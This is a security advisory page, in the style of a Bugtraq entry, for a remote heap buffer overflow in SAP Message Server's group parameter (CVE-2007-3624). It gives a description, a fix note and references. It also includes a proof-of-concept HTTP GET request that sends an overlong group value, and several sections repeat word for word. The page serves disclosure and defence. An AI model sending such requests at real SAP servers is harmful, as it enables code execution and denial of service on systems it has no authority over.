SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability
BID:24765
Info
SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 24765 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2007-3624 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 05 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | Mark Litchfield is credited with the discovery of this issue. |
| Vulnerable: |
SAP Message Server 0 |
| Not Vulnerable: | |
Discussion
SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability
SAP Message Server is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.
Remote attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers. Failed attacks will likely result in denial-of-service conditions that disable all functionality of the application.
SAP Message Server is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.
Remote attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers. Failed attacks will likely result in denial-of-service conditions that disable all functionality of the application.
Exploit / POC
SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability
The following proof-of-concept GET request is available:
GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)
Host: sapserver:8100
Proxy-Connection: Keep-Alive
The following proof-of-concept GET request is available:
GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)
Host: sapserver:8100
Proxy-Connection: Keep-Alive
Solution / Fix
SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply the update.
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply the update.
References
SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability
References:
References:
- SAP Homepage (SAP)
- VU#305657: SAP Message Server heap buffer overflow (US-CERT)
- SAP Message Server Heap Overflow (NGS Software Insight Security Research)